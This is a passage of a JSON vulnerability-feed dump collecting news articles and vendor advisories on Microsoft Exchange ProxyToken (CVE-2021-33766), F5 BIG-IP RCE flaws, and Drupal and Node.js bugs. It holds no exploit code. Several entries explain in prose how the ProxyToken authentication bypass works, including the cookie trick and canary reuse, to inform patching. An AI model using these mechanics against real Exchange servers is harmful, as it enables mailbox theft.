"https://threatpost.com/parallels-inconvenient-fix/168997/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T18:54:34", "description": "A serious security vulnerability in Microsoft Exchange Server that researchers have dubbed ProxyToken could allow an unauthenticated attacker to access and steal emails from a target\u2019s mailbox.\n\nMicrosoft Exchange uses two websites; one, the front end, is what users connect to in order to access email. The second is a back-end site that handles the authentication function.\n\n\u201cThe front-end website is mostly just a proxy to the back end. To allow access that requires forms authentication, the front end serves pages such as /owa/auth/logon.aspx,\u201d according to a [Monday posting](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) on the bug from Trend Micro\u2019s Zero Day Initiative. \u201cFor all post-authentication requests, the front end\u2019s main role is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\u201d\n\nThe issue arises specifically in a feature called \u201cDelegated Authentication,\u201d where the front end passes authentication requests directly to the back end. These requests contain a SecurityToken cookie that identifies them; i.e., if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. 
However, Exchange has to be specifically configured to have the back end perform the authentication checks; in a default configuration, the module responsible for that (the \u201cDelegatedAuthModule\u201d) isn\u2019t loaded.\n\n\u201cWhen the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request,\u201d according to ZDI. \u201cMeanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.\u201d\n\nFrom there, an attacker could install a forwarding rule allowing them to read the victim\u2019s incoming mail.\n\n\u201cWith this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\u201d according to the post. \u201cAs an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\u201d\n\nZDI outlined an exploitation scenario wherein an attacker has an account on the same Exchange server as the victim. However, if an administrator permits forwarding rules having arbitrary internet destinations, no Exchange credentials are needed at all, researchers noted.\n\nThe bug ([CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)) was reported to the Zero Day Initiative by researcher Le Xuan Tuyen of VNPT ISC, and it was patched by Microsoft in the July Exchange cumulative updates. 
Organizations should update their products to avoid compromise.\n\nThe ProxyToken revelation comes after [the disclosure of](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) ProxyLogon in early March; that\u2019s an exploit chain made up of four Exchange flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), which together create a pre-authentication remote code execution (RCE) exploit. Attackers can take over unpatched servers without knowing any valid account credentials, giving them access to email communications and the opportunity to install a web shell for further exploitation within the environment. ProxyLogon was weaponized in [wide-scale attacks](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) throughout the spring.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-30T17:31:06", "type": "threatpost", "title": "Microsoft Exchange 'ProxyToken' Bug Allows Email Snooping", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-33766"], "modified": "2021-08-30T17:31:06", "id": "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "href": "https://threatpost.com/microsoft-exchange-proxytoken-email/169030/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-11T14:39:21", "description": "F5 Networks is warning users to patch four critical remote command execution (RCE) flaws in its BIG-IP and BIG-IQ enterprise networking infrastructure. If exploited, the flaws could allow attackers to take full control over a vulnerable system.\n\nThe company released an advisory, Wednesday, on seven bugs in total, with two others rated as high risk and one rated as medium risk. \u201cWe strongly encourage all customers to update their BIG-IP and BIG-IQ systems to a fixed version as soon as possible,\u201d the company [advised](<https://www.f5.com/services/support/March2021_Vulnerabilities>) on its website.\n\nThe scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world\u2019s biggest financial institutions and ISPs.\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) also [urged](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq>) companies using BIG-IP and BIG-IQ to fix two of the critical vulnerabilities, which are being tracked as [CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) and [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>).\n\nThe former, with a CVSS rating of 9.8, is an unauthenticated remote command execution vulnerability in the iControl REST interface, according to a [detailed breakdown](<https://support.f5.com/csp/article/K02566623>) of the bugs in F5\u2019s Knowledge Center. The latter, with a CVSS rating of 9.9, affects the infrastructure\u2019s Traffic Management User Interface (TMUI), also referred to as the Configuration utility. When running in Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed pages, according to F5.\n\nThe two other critically rated vulnerabilities are being tracked as [CVE-2021-22991](<https://support.f5.com/csp/article/K56715231>) and [CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>). The first, with a CVSS score of 9.0, is a buffer overflow vulnerability that can be triggered when \u201cundisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization,\u201d according to F5. This can result in a denial-of-service (DoS) attack that, in some situations, \u201cmay theoretically allow bypass of URL based access control or remote code execution (RCE),\u201d the company warned.\n\nCVE-2021-22992 is also a buffer overflow bug with a CVSS rating of 9. This flaw can be triggered by \u201ca malicious HTTP response to an Advanced WAF/BIG-IP ASM virtual server with Login Page configured in its policy,\u201d according to F5. 
It also may allow for RCE and \u201ccomplete system compromise\u201d in some situations, the company warned.\n\nThe other three non-critical bugs being patched in F5\u2019s update this week are [CVE-2021-22988](<https://support.f5.com/csp/article/K70031188>), [CVE-2021-22989](<https://support.f5.com/csp/article/K56142644>) and [CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>).\n\nCVE-2021-22988, with a CVSS score of 8.8, is an authenticated RCE that also affects TMUI. CVE-2021-22989, with a CVSS rating of 8.0, is another authenticated RCE that also affects TMUI in Appliance mode, this time when Advanced WAF or BIG-IP ASM are provisioned. And CVE-2021-22990, with a CVSS score of 6.6, is a similar but less dangerous vulnerability that exists in the same scenario, according to F5.\n\nF5 is no stranger to critical bugs in its enterprise networking products. In July, the vendor and other security experts\u2014including U.S. Cyber Command\u2014urged companies to deploy an urgent patch for a critical RCE vulnerability in BIG-IP\u2019s app delivery controllers that was being actively exploited by attackers to scrape credentials, launch malware and more. That bug ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)) had a CVSS rating of 10 out of 10. 
Moreover, a delay in patching at the time left systems [exposed to the flaw](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>) for weeks after F5 released the fix.\n", "cvss3": {}, "published": "2021-03-11T14:21:50", "type": "threatpost", "title": "F5, CISA Warn of Critical BIG-IP and BIG-IQ RCE Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5902", "CVE-2021-2290", "CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992"], "modified": "2021-03-11T14:21:50", "id": "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "href": "https://threatpost.com/f5-cisa-critical-rce-bugs/164679/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-05-23T16:36:04", "description": "Microsoft Exchange Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Information Disclosure Vulnerability", 
"bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-33766", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33766", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "malwarebytes": [{"lastseen": "2021-09-02T12:34:56", "description": "Had I known this season of Microsoft Exchange was going to be so long I'd have binge watched. Does anyone know how many episodes there are?\n\nSarcasm aside, while ProxyToken may seem like yet another episode of 2021's longest running show, that doesn\u2019t make it any less serious, or any less eye-catching. The plot is a real nail-biter (and there's a shocking twist at the end).\n\nThis week's instalment is called ProxyToken. It's a vulnerability that allows an unauthenticated attacker to perform configuration actions on mailboxes belonging to arbitrary users. For example, an attacker could use the vulnerability to forward your mail to their account, and read all of your email. And not just your account. The mail for all your co-workers too. 
So there are multiple possible themes for this episode, including plain old data theft, industrial espionage, or just espionage.\n\n### Background and character development\n\nBefore we can explain this week's plot, it's important to catch up on some background information, and meet some of the principal players.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during installation. The installation also creates two sites in IIS. One is the default website, listening on ports 80 for HTTP and 443 for HTTPS. This is the site that all clients connect to for web access.\n\nThis front-end website for Microsoft Exchange in IIS is mostly just a proxy to the back end. The Exchange back end listens on ports 81 for HTTP and 444 for HTTPS. For all post-authentication requests, the front end\u2019s job is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\n\nWhich is all good, if it weren\u2019t for a feature called \u201cDelegated Authentication\u201d that Exchange supports for cross-forest topologies. An Active Directory forest (AD forest) is the topmost logical container in an Active Directory configuration that contains domains, users, computers, and group policies. A single Active Directory configuration can contain more than one domain, and we call the tier above domain the AD forest. Under each domain, you can have several trees, and it can be tough to see the forest for the trees.\n\nForest trusts reduce the number of external trusts that need to be created. Forest trusts are created between the root domains of two forests. In such deployments, the Exchange Server front end is not able to perform authentication decisions on its own. 
Instead, the front end passes requests directly to the back end, relying on the back end to determine whether the request is properly authenticated. These requests that are to be authenticated using back-end logic are identified by the presence of a SecurityToken cookie.\n\n### The plot\n\nFor requests where the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. But the back end is sometimes completely unaware that it needs to authenticate these incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule that checks for this cookie is not loaded in installations that have not been configured to use the special delegated authentication feature. The astonishing end result is that specially crafted requests can go through without being subjected to authentication, on either the front end or the back end.\n\n### The twist\n\nThere is one additional hurdle an attacker needs to clear before they can successfully issue an unauthenticated request, but it turns out to be a minor nuisance. Each request to an Exchange Control Panel (ECP) page is required to have a ticket known as the \u201cECP canary\u201d. Without a canary, the request will result in an HTTP 500 response.\n\nHowever, as luck would have it for the attacker, the 500 error response is accompanied by a valid canary, which the attacker can use in their next, specially crafted, request.\n\n### The cliffhanger\n\nThis particular exploit assumes that the attacker has an account on the same Exchange server as the victim. It installs a forwarding rule that allows the attacker to read all the victim\u2019s incoming mail. On some Exchange installations, an administrator may have set a global configuration value that permits forwarding rules having arbitrary Internet destinations, and in that case, the attacker does not need any Exchange credentials at all. 
Furthermore, since the entire ECP site is potentially affected, various other means of exploitation may be available as well.\n\n### Credits\n\nThe ProxyToken vulnerability was reported to the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) in March 2021 by researcher Le Xuan Tuyen of VNPT ISC. The vulnerability is listed under [CVE-2021-33766](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33766>) as a Microsoft Exchange Information Disclosure Vulnerability and it was published by Microsoft in the July 2021 Exchange cumulative updates. This CVE was addressed by updates that were released in April 2021, but the CVE was inadvertently omitted from the April 2021 Security Updates.\n\n### Other "must watch" episodes\n\nMicrosoft Exchange has been riveting viewing this year, and with four months of the year to go it seems unlikely that ProxyToken is going to be the season finale. So here's a list of this season's "must watch" episodes (so far). If you've missed any, we suggest you catch up as soon as possible.\n\n * ProxyToken\n * [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>)\n * [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\n * [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>)\n\nAnd remember, Exchange is attracting a lot of interest this year. Everyone's a fan. 
All of these vulnerabilities are being actively scanned for and exploited by malware peddlers, including ransomware gangs.\n\nThe post [ProxyToken: Another nail-biter from Microsoft Exchange](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/proxytoken-another-nailbiter-from-microsoft-exchange/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-31T13:29:05", "type": "malwarebytes", "title": "ProxyToken: Another nail-biter from Microsoft Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-31T13:29:05", "id": "MALWAREBYTES:BDB324B2E5CD88570A6B585DB46F717D", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/proxytoken-another-nailbiter-from-microsoft-exchange/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdi": [{"lastseen": "2023-05-23T15:50:04", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange Server. 
Authentication is not required to exploit this vulnerability. The specific flaw exists within the authentication of requests to web services within the ecp web application. By issuing a crafted request, an attacker can bypass authentication. An attacker can leverage this vulnerability to disclose information from the server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-15T00:00:00", "type": "zdi", "title": "Microsoft Exchange Server ECP Authentication Bypass Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-07-15T00:00:00", "id": "ZDI-21-798", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-798/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ibm": [{"lastseen": "2023-02-27T21:47:09", "description": "## Summary\n\nIBM API Connect has addressed the following vulnerability.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2020-13671](<https://vulners.com/cve/CVE-2020-13671>) \n**DESCRIPTION:** Drupal Core could allow a remote attacker to execute arbitrary code on the system, caused by the failure to properly sanitize certain filenames on uploaded files. Because such files can be interpreted as having the incorrect extension and served with the wrong MIME type, an attacker could exploit this vulnerability to execute arbitrary PHP code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/191949](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191949>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM API Connect | V5.0.0.0-5.0.8.10 \nIBM API Connect | V10.0.1.0 \nIBM API Connect | V2018.4.1.0-2018.4.1.13 \n\n## Remediation/Fixes\n\nAffected Product | Addressed in VRMF | APAR | Remediation/First Fix \n---|---|---|--- \nIBM API Connect V5.0.0.0-5.0.8.10 | 5.0.8.10 iFix | LI81861 | Addressed in IBM API Connect 5.0.8.10 iFix published on or after Nov 23, 2020. Developer Portal is impacted. Follow this link and find the \"Portal\" package: [http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.8.10&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \nIBM API Connect V2018.4.1.0-2018.4.1.13 | 2018.4.1.15 | LI81861 | Addressed in IBM API Connect V2018.4.1.15. Developer Portal is impacted. Follow this link and find the \"Portal\" package: [http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=2018.4.1.13&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \nIBM API Connect V10.0.0.0-V10.0.1.0 | 10.0.1.1 | LI81861 | Addressed in IBM API Connect V10.0.1.1. Developer Portal is impacted. Follow this link and find the \"Portal\" package: [http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.1.0&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \n\n## Workarounds and Mitigations\n\nNone\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-02T14:58:19", "type": "ibm", "title": "Security Bulletin: IBM API Connect's Developer Portal is vulnerable to arbitrary code execution in Drupal Core (CVE-2020-13671)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2021-02-02T14:58:19", "id": "CDAD34A91006F074A8F35D92B48F8CC9A791B0245670197CE6014F52DEE81660", "href": "https://www.ibm.com/support/pages/node/6410870", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-02T20:04:54", "description": "## Summary\n\nVulnerabilities in Apache and Node.js such as execution of arbitrary code on the system, 
cross -site scripting, and bypassing security restrictions, may affect IBM Spectrum Protect Plus.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2020-28458](<https://vulners.com/cve/CVE-2020-28458>) \n**DESCRIPTION: **Node.js datatables.net module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/193390](<https://exchange.xforce.ibmcloud.com/vulnerabilities/193390>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID: **[CVE-2021-21315](<https://vulners.com/cve/CVE-2021-21315>) \n**DESCRIPTION: **System Information Library for Node.JS could allow a remote attacker to execute arbitrary commands on the system, caused by command injection flaw when parsing service parameters. By sending a specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196894](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196894>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2020-13959](<https://vulners.com/cve/CVE-2020-13959>) \n**DESCRIPTION: **Apache Velocity Tools is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the default error page for VelocityView. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. 
\nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197994](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197994>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID: **[CVE-2020-13936](<https://vulners.com/cve/CVE-2020-13936>) \n**DESCRIPTION: **Apache Velocity could allow a remote attacker to execute arbitrary code on the system, caused by a sandbox bypass flaw. By modifying the Velocity templates, an attacker could exploit this vulnerability to execute arbitrary code with the same privileges as the account running the Servlet container. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197993](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197993>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2020-13956](<https://vulners.com/cve/CVE-2020-13956>) \n**DESCRIPTION: **Apache HttpClient could allow a remote attacker to bypass security restrictions, caused by the improper handling of malformed authority component in request URIs. By passing request URIs to the library as java.net.URI object, an attacker could exploit this vulnerability to pick the wrong target host for request execution. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/189572](<https://exchange.xforce.ibmcloud.com/vulnerabilities/189572>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\n**Affected Product(s)** | **Version(s)** \n---|--- \nIBM Spectrum Protect Plus | 10.1.0-10.1.7 \n \n## Remediation/Fixes\n\n**BM Spectrum Protect** \n**Plus Release** | **First Fixing** \n**VRM Level** | **Platform** | **Link to Fix** \n---|---|---|--- \n10.1 | 10.1.8 | Linux | <https://www.ibm.com/support/pages/node/6415111> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-24T06:55:55", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache and Node.js affect IBM Spectrum Protect Plus", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13936", "CVE-2020-13956", "CVE-2020-13959", "CVE-2020-28458", "CVE-2021-21315"], "modified": "2021-04-24T06:55:55", "id": "098A0B0BBDA18721083717F103FE7FB2B2BBE2394E33149D968FE7B59A7B2AD4", "href": "https://www.ibm.com/support/pages/node/6445703", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2022-05-21T01:08:49", "description": "Drupal 
core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-20T23:37:25", "type": "redhatcve", "title": "CVE-2020-13671", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-05-20T23:37:25", "id": "RH:CVE-2020-13671", "href": "https://access.redhat.com/security/cve/cve-2020-13671", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:52", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. 
